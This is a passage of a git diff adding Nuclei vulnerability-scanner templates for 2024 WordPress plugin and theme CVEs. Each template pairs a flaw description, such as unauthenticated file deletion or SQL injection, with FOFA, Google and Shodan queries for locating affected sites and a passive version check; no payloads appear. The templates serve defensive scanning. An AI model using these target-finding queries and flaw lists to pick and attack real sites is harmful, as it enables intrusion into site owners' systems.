+ regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tempera" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43952.yaml b/nuclei-templates/CVE-2024/CVE-2024-43952.yaml new file mode 100644 index 0000000000..7a2735c6ae --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43952.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43952 + +info: + name: > + Esotera <= 1.2.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Esotera theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/55eeeb28-262e-49c5-a2b3-944345a9142d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43952 + metadata: + fofa-query: "wp-content/themes/esotera/" + google-query: inurl:"/wp-content/themes/esotera/" + shodan-query: 'vuln:CVE-2024-43952' + tags: cve,wordpress,wp-theme,esotera,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/esotera/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "esotera" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43953.yaml b/nuclei-templates/CVE-2024/CVE-2024-43953.yaml new file mode 100644 index 0000000000..6bb7db6478 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43953.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43953 + +info: + name: > + Classic Addons – WPBakery Page Builder <= 3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Classic Addons – WPBakery Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7b86b0b-84df-4b58-b50a-d61af6e3c1d3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43953 + metadata: + fofa-query: "wp-content/plugins/classic-addons-wpbakery-page-builder-addons/" + google-query: inurl:"/wp-content/plugins/classic-addons-wpbakery-page-builder-addons/" + shodan-query: 'vuln:CVE-2024-43953' + tags: cve,wordpress,wp-plugin,classic-addons-wpbakery-page-builder-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/classic-addons-wpbakery-page-builder-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "classic-addons-wpbakery-page-builder-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43954.yaml b/nuclei-templates/CVE-2024/CVE-2024-43954.yaml new file mode 100644 index 0000000000..3f1cf3b022 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43954.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43954 + +info: + name: > + Droip <= 1.1.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Settings Change + author: topscoder + severity: low + description: > + The Droip plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on a function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/84141197-b6a7-44fa-8058-e9f192d1d56f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43954 + metadata: + fofa-query: "wp-content/plugins/droip/" + google-query: inurl:"/wp-content/plugins/droip/" + shodan-query: 'vuln:CVE-2024-43954' + tags: cve,wordpress,wp-plugin,droip,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/droip/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "droip" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43955.yaml b/nuclei-templates/CVE-2024/CVE-2024-43955.yaml new file mode 100644 index 0000000000..e495321fc4 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43955.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43955 + +info: + name: > + Droip <= 1.1.1 - Unauthenticated Arbitrary File Deletion + author: topscoder + severity: critical + description: > + The Droip plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in a function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1fc4ce9-ae96-4d8e-bf1c-941ed15d7d1a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-43955 + metadata: + fofa-query: "wp-content/plugins/droip/" + google-query: inurl:"/wp-content/plugins/droip/" + shodan-query: 'vuln:CVE-2024-43955' + tags: cve,wordpress,wp-plugin,droip,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/droip/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "droip" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43956.yaml b/nuclei-templates/CVE-2024/CVE-2024-43956.yaml new file mode 100644 index 0000000000..613753a41d --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43956.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43956 + +info: + name: > + Memberpress <= 1.11.29 - Missing Authorization + author: topscoder + severity: high + description: > + The Memberpress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.11.29. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/690cc457-7951-4a4d-979b-8464513a3b50?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43956 + metadata: + fofa-query: "wp-content/plugins/memberpress/" + google-query: inurl:"/wp-content/plugins/memberpress/" + shodan-query: 'vuln:CVE-2024-43956' + tags: cve,wordpress,wp-plugin,memberpress,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/memberpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "memberpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.29') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43957.yaml b/nuclei-templates/CVE-2024/CVE-2024-43957.yaml new file mode 100644 index 0000000000..dfe089407e --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43957.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43957 + +info: + name: > + Animated Number Counters <= 1.9 - Authenticated (Editor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Animated Number Counters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9. This makes it possible for authenticated attackers, with editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1d7f2f5-0685-4be0-bd3b-93c39d9bb7ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43957 + metadata: + fofa-query: "wp-content/plugins/animated-number-counters/" + google-query: inurl:"/wp-content/plugins/animated-number-counters/" + shodan-query: 'vuln:CVE-2024-43957' + tags: cve,wordpress,wp-plugin,animated-number-counters,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/animated-number-counters/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "animated-number-counters" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43958.yaml b/nuclei-templates/CVE-2024/CVE-2024-43958.yaml new file mode 100644 index 0000000000..847f452a65 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43958.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43958 + +info: + name: > + IntoTheDark <= 1.0.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The IntoTheDark theme for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a534d51d-2bf8-40ab-a043-88c5f14542b9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43958 + metadata: + fofa-query: "wp-content/themes/intothedark/" + google-query: inurl:"/wp-content/themes/intothedark/" + shodan-query: 'vuln:CVE-2024-43958' + tags: cve,wordpress,wp-theme,intothedark,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/intothedark/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "intothedark" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43959.yaml b/nuclei-templates/CVE-2024/CVE-2024-43959.yaml new file mode 100644 index 0000000000..502bbcde32 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43959.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43959 + +info: + name: > + Testimonials <= 3.0.8 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Testimonials plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/01cb63ab-2198-443a-8eee-ee4f1cf2fdc4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43959 + metadata: + fofa-query: "wp-content/plugins/super-testimonial/" + google-query: inurl:"/wp-content/plugins/super-testimonial/" + shodan-query: 'vuln:CVE-2024-43959' + tags: cve,wordpress,wp-plugin,super-testimonial,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/super-testimonial/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "super-testimonial" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.8') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43960.yaml b/nuclei-templates/CVE-2024/CVE-2024-43960.yaml new file mode 100644 index 0000000000..668b7a51fb --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43960.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43960 + +info: + name: > + Web and WooCommerce Addons for WPBakery Builder <= 1.4.7 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Web and WooCommerce Addons for WPBakery Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/310b8622-8cc5-4fdb-8f83-b541aad136ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-43960 + metadata: + fofa-query: "wp-content/plugins/vc-addons-by-bit14/" + google-query: inurl:"/wp-content/plugins/vc-addons-by-bit14/" + shodan-query: 'vuln:CVE-2024-43960' + tags: cve,wordpress,wp-plugin,vc-addons-by-bit14,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vc-addons-by-bit14/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vc-addons-by-bit14" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43961.yaml b/nuclei-templates/CVE-2024/CVE-2024-43961.yaml new file mode 100644 index 0000000000..6f434c5133 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43961.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43961 + +info: + name: > + azurecurve Toggle Show/Hide <= 2.1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The azurecurve Toggle Show/Hide plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bba2eb67-70a9-438b-8d18-774fcf557469?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43961 + metadata: + fofa-query: "wp-content/plugins/azurecurve-toggle-showhide/" + google-query: inurl:"/wp-content/plugins/azurecurve-toggle-showhide/" + shodan-query: 'vuln:CVE-2024-43961' + tags: cve,wordpress,wp-plugin,azurecurve-toggle-showhide,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/azurecurve-toggle-showhide/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "azurecurve-toggle-showhide" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43962.yaml b/nuclei-templates/CVE-2024/CVE-2024-43962.yaml new file mode 100644 index 0000000000..7356c5588d --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43962.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43962 + +info: + name: > + LWS Affiliation <= 2.3.3 - Missing Authorization + author: topscoder + severity: low + description: > + The LWS Affiliation plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8dfc1de-e17d-45c0-aab7-351150c07545?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43962 + metadata: + fofa-query: "wp-content/plugins/lws-affiliation/" + google-query: inurl:"/wp-content/plugins/lws-affiliation/" + shodan-query: 'vuln:CVE-2024-43962' + tags: cve,wordpress,wp-plugin,lws-affiliation,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/lws-affiliation/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "lws-affiliation" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43963.yaml b/nuclei-templates/CVE-2024/CVE-2024-43963.yaml new file mode 100644 index 0000000000..665dd41070 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43963.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43963 + +info: + name: > + YellowPencil Visual CSS Style Editor <= 7.6.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Visual CSS Style Editor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 7.6.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6714ccff-ab6f-4222-96eb-7f442e94f225?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43963 + metadata: + fofa-query: "wp-content/plugins/yellow-pencil-visual-theme-customizer/" + google-query: inurl:"/wp-content/plugins/yellow-pencil-visual-theme-customizer/" + shodan-query: 'vuln:CVE-2024-43963' + tags: cve,wordpress,wp-plugin,yellow-pencil-visual-theme-customizer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/yellow-pencil-visual-theme-customizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "yellow-pencil-visual-theme-customizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.6.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43964.yaml b/nuclei-templates/CVE-2024/CVE-2024-43964.yaml new file mode 100644 index 0000000000..9c711732ab --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43964.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43964 + +info: + name: > + DSGVO All in one for WP <= 4.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The DSGVO All in one for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/30f3a208-ffe0-4d87-9c76-91451f7a1591?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43964 + metadata: + fofa-query: "wp-content/plugins/dsgvo-all-in-one-for-wp/" + google-query: inurl:"/wp-content/plugins/dsgvo-all-in-one-for-wp/" + shodan-query: 'vuln:CVE-2024-43964' + tags: cve,wordpress,wp-plugin,dsgvo-all-in-one-for-wp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dsgvo-all-in-one-for-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dsgvo-all-in-one-for-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43965.yaml b/nuclei-templates/CVE-2024/CVE-2024-43965.yaml new file mode 100644 index 0000000000..f9cb95d50b --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43965.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43965 + +info: + name: > + SendGrid for WordPress <= 1.4 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The SendGrid for WordPress plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdb3c672-0ac4-42e8-951b-e41dc8bd6231?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-43965 + metadata: + fofa-query: "wp-content/plugins/wp-sendgrid-mailer/" + google-query: inurl:"/wp-content/plugins/wp-sendgrid-mailer/" + shodan-query: 'vuln:CVE-2024-43965' + tags: cve,wordpress,wp-plugin,wp-sendgrid-mailer,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-sendgrid-mailer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-sendgrid-mailer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43970.yaml b/nuclei-templates/CVE-2024/CVE-2024-43970.yaml new file mode 100644 index 0000000000..b9a1b99013 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43970.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43970 + +info: + name: > + SureCart <= 2.29.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The SureCart plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.29.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f2fdc9d-891e-49c6-9427-620772336854?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43970 + metadata: + fofa-query: "wp-content/plugins/surecart/" + google-query: inurl:"/wp-content/plugins/surecart/" + shodan-query: 'vuln:CVE-2024-43970' + tags: cve,wordpress,wp-plugin,surecart,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/surecart/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "surecart" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.29.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43971.yaml b/nuclei-templates/CVE-2024/CVE-2024-43971.yaml new file mode 100644 index 0000000000..e21d5fbe30 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43971.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43971 + +info: + name: > + Sunshine Photo Cart <= 3.2.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Sunshine Photo Cart: Free Client Photo Galleries for Photographers plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb99654-c0f4-4c75-9b9d-f3075db623fc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43971 + metadata: + fofa-query: "wp-content/plugins/sunshine-photo-cart/" + google-query: inurl:"/wp-content/plugins/sunshine-photo-cart/" + shodan-query: 'vuln:CVE-2024-43971' + tags: cve,wordpress,wp-plugin,sunshine-photo-cart,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sunshine-photo-cart/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sunshine-photo-cart" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43972.yaml b/nuclei-templates/CVE-2024/CVE-2024-43972.yaml new file mode 100644 index 0000000000..54911f93a6 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43972.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43972 + +info: + name: > + PageLayer <= 1.8.7 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The PageLayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 